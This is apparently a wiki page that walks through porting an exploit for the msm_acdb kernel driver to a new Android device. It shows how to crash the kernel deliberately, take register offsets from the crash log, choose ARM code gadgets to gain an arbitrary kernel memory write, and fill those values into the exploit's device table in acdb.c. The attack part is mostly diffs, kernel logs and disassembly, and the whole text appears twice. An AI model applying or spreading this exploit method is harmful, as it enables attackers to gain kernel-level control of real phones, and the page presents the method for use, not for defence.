fi01/How to use msm_acdb explot

## How to use msm_acdb explot
To use msm_acdb explot we need to work 4 steps.
  1. Find how to run command with root or system previlege
  2. Get offset for registers to setup
  3. Choose proper code in kernel image
  4. Setup parameters in acdb.c


1. Find how to run command with root or system previlege
  Do it your self.   :-P


2. Get offset for registers to setup
  - Add dummy entry to get crach log.

    --- a/acdb.c
    +++ b/acdb.c
    @@ -43,6 +43,7 @@ static supported_device supported_devices[] = {
       { DEVICE_SH04E_01_00_02,          { 0x7c, 0x88, { 0x8c, 0xc02498e0 }, { 0xac, 0xc000dd1c } } },
       { DEVICE_SH04E_01_00_03,          { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
       { DEVICE_SH04E_01_00_04,          { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
    +  { DEVICE_SH05E_01_00_05,          { 0, 0, { 0, 0}, { 0, 0} } },
       { DEVICE_SO04D_7_0_D_1_137,       { 0x80, 0x90, { 0x9c, 0xc0326a38 }, { 0xbc, 0xc0526964 } } },
       { DEVICE_SO05D_7_0_D_1_137,       { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } },
       { DEVICE_SOL21_9_1_D_0_395,       { 0x7c, 0x88, { 0x8c, 0xc0244778 }, { 0xac, 0xc000dd24 } } },

  - Build tool

  - Stop services to avoid lost data

  - Run tool with root or system previlege
    It will be reboot due to cause kernel panic.

  - See crash log
    (e.g. /proc/last_kmsg or log partition)
      <3>[  348.770486] ACDB=> ACDB ioctl not found!
      <1>[  348.770547] Unable to handle kernel NULL pointer dereference at virtual address 0000009c
      <1>[  348.770608] pgd = df18c000
      <1>[  348.770639] [0000009c] *pgd=9b727831, *pte=00000000, *ppte=00000000
      <0>[  348.770700] Internal error: Oops: 80000007 [#1] PREEMPT SMP
      <4>[  348.770761] Modules linked in:
      <4>[  348.770791] CPU: 0    Not tainted  (3.0.8 #1)
      <4>[  348.770853] PC is at 0x9c
      <4>[  348.770883] LR is at acdb_ioctl+0x740/0x860
      <4>[  348.770944] pc : [<0000009c>]    lr : [<c0137658>]    psr: 60000013
      <4>[  348.770944] sp : ce513f28  ip : 00000000  fp : 00000098
      <4>[  348.771005] r10: 00000094  r9 : 00000090  r8 : 0000008c
      <4>[  348.771066] r7 : 00000088  r6 : 00000084  r5 : 00000080  r4 : 0000007c
      <4>[  348.771097] r3 : 00000000  r2 : ce513e74  r1 : c0973db8  r0 : 00000000
      <4>[  348.771158] Flags: nZCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user

    You'll found offset for register in buffer.
      R4 : 0x7c
      R5 : 0x80
      R6 : 0x84
      R7 : 0x88
      R8 : 0x8c
      R9 : 0x90
      R10: 0x94
      R11: 0x98
      PC : 0x9c

  - Disassemble do_vfs_ioctl and check return code
      c021d8fc: e2 8d d0 44           ADD     SP, SP, #$44
      c021d900: e8 bd 83 f0           LDMUW   [SP], { R4-R9, PC }

    You'll found add 0x44 bytes to SP and restore register R4-R9 and PC.

3. Choose proper code in kernel image
  - Choose code to write value and to end do_vfs_ioctl code from kernel image
    They should use same size on stack and restore same registers with do_vfs_ioctl like this:

      write code: use R9 as write address and R5 as write value, and use 0x20 bytes
  c0381b98: e5 89 50 00           STR     R5, [R9]
	c0381b9c: e8 bd 87 f0           LDMUW   [SP], { R4-R10, PC }

      end do_vfs_ioctl code: use 0x24 bytes (=0x44 - 0x20) and restore R4-R9 and PC
	c0231b98: e2 8d d0 24           ADD     SP, SP, #$24
	c0231b9c: e8 bd 83 f0           LDMUW   [SP], { R4-R9, PC }

4. Setup parameters in acdb.c
  - Setup parameters in acdb.c
    Write value is R5, offset = 0x80
    Write address is R9, offset = 0x90
    Write code is offset 0x9c and address = 0xc0381b98
    End do_vfs_ioctl code is offset 0xbc (=0x9c + 0x20) and address = 0xc0231b98

    --- a/acdb.c
    +++ b/acdb.c
    @@ -43,6 +43,7 @@ static supported_device supported_devices[] = {
       { DEVICE_SH04E_01_00_02,          { 0x7c, 0x88, { 0x8c, 0xc02498e0 }, { 0xac, 0xc000dd1c } } },
       { DEVICE_SH04E_01_00_03,          { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
       { DEVICE_SH04E_01_00_04,          { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
    +  { DEVICE_SH05E_01_00_05,          { 0x80, 0x90, { 0x9c, 0xc0381b98 }, { 0xbc, 0xc0231b98} } },
       { DEVICE_SO04D_7_0_D_1_137,       { 0x80, 0x90, { 0x9c, 0xc0326a38 }, { 0xbc, 0xc0526964 } } },
       { DEVICE_SO05D_7_0_D_1_137,       { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } },
       { DEVICE_SOL21_9_1_D_0_395,       { 0x7c, 0x88, { 0x8c, 0xc0244778 }, { 0xac, 0xc000dd24 } } },

That's all. Have fun!!
	To use msm_acdb explot we need to work 4 steps.
	1. Find how to run command with root or system previlege
	2. Get offset for registers to setup
	3. Choose proper code in kernel image
	4. Setup parameters in acdb.c


	1. Find how to run command with root or system previlege
	Do it your self. :-P


	2. Get offset for registers to setup
	- Add dummy entry to get crach log.

	--- a/acdb.c
	+++ b/acdb.c
	@@ -43,6 +43,7 @@ static supported_device supported_devices[] = {
	{ DEVICE_SH04E_01_00_02, { 0x7c, 0x88, { 0x8c, 0xc02498e0 }, { 0xac, 0xc000dd1c } } },
	{ DEVICE_SH04E_01_00_03, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
	{ DEVICE_SH04E_01_00_04, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
	+ { DEVICE_SH05E_01_00_05, { 0, 0, { 0, 0}, { 0, 0} } },
	{ DEVICE_SO04D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc0326a38 }, { 0xbc, 0xc0526964 } } },
	{ DEVICE_SO05D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } },
	{ DEVICE_SOL21_9_1_D_0_395, { 0x7c, 0x88, { 0x8c, 0xc0244778 }, { 0xac, 0xc000dd24 } } },

	- Build tool

	- Stop services to avoid lost data

	- Run tool with root or system previlege
	It will be reboot due to cause kernel panic.

	- See crash log
	(e.g. /proc/last_kmsg or log partition)
	<3>[ 348.770486] ACDB=> ACDB ioctl not found!
	<1>[ 348.770547] Unable to handle kernel NULL pointer dereference at virtual address 0000009c
	<1>[ 348.770608] pgd = df18c000
	<1>[ 348.770639] [0000009c] pgd=9b727831, pte=00000000, *ppte=00000000
	<0>[ 348.770700] Internal error: Oops: 80000007 [#1] PREEMPT SMP
	<4>[ 348.770761] Modules linked in:
	<4>[ 348.770791] CPU: 0 Not tainted (3.0.8 #1)
	<4>[ 348.770853] PC is at 0x9c
	<4>[ 348.770883] LR is at acdb_ioctl+0x740/0x860
	<4>[ 348.770944] pc : [<0000009c>] lr : [<c0137658>] psr: 60000013
	<4>[ 348.770944] sp : ce513f28 ip : 00000000 fp : 00000098
	<4>[ 348.771005] r10: 00000094 r9 : 00000090 r8 : 0000008c
	<4>[ 348.771066] r7 : 00000088 r6 : 00000084 r5 : 00000080 r4 : 0000007c
	<4>[ 348.771097] r3 : 00000000 r2 : ce513e74 r1 : c0973db8 r0 : 00000000
	<4>[ 348.771158] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user

	You'll found offset for register in buffer.
	R4 : 0x7c
	R5 : 0x80
	R6 : 0x84
	R7 : 0x88
	R8 : 0x8c
	R9 : 0x90
	R10: 0x94
	R11: 0x98
	PC : 0x9c

	- Disassemble do_vfs_ioctl and check return code
	c021d8fc: e2 8d d0 44 ADD SP, SP, #$44
	c021d900: e8 bd 83 f0 LDMUW [SP], { R4-R9, PC }

	You'll found add 0x44 bytes to SP and restore register R4-R9 and PC.

	3. Choose proper code in kernel image
	- Choose code to write value and to end do_vfs_ioctl code from kernel image
	They should use same size on stack and restore same registers with do_vfs_ioctl like this:

	write code: use R9 as write address and R5 as write value, and use 0x20 bytes
	c0381b98: e5 89 50 00 STR R5, [R9]
	c0381b9c: e8 bd 87 f0 LDMUW [SP], { R4-R10, PC }

	end do_vfs_ioctl code: use 0x24 bytes (=0x44 - 0x20) and restore R4-R9 and PC
	c0231b98: e2 8d d0 24 ADD SP, SP, #$24
	c0231b9c: e8 bd 83 f0 LDMUW [SP], { R4-R9, PC }

	4. Setup parameters in acdb.c
	- Setup parameters in acdb.c
	Write value is R5, offset = 0x80
	Write address is R9, offset = 0x90
	Write code is offset 0x9c and address = 0xc0381b98
	End do_vfs_ioctl code is offset 0xbc (=0x9c + 0x20) and address = 0xc0231b98

	--- a/acdb.c
	+++ b/acdb.c
	@@ -43,6 +43,7 @@ static supported_device supported_devices[] = {
	{ DEVICE_SH04E_01_00_02, { 0x7c, 0x88, { 0x8c, 0xc02498e0 }, { 0xac, 0xc000dd1c } } },
	{ DEVICE_SH04E_01_00_03, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
	{ DEVICE_SH04E_01_00_04, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } },
	+ { DEVICE_SH05E_01_00_05, { 0x80, 0x90, { 0x9c, 0xc0381b98 }, { 0xbc, 0xc0231b98} } },
	{ DEVICE_SO04D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc0326a38 }, { 0xbc, 0xc0526964 } } },
	{ DEVICE_SO05D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } },
	{ DEVICE_SOL21_9_1_D_0_395, { 0x7c, 0x88, { 0x8c, 0xc0244778 }, { 0xac, 0xc000dd24 } } },

	That's all. Have fun!!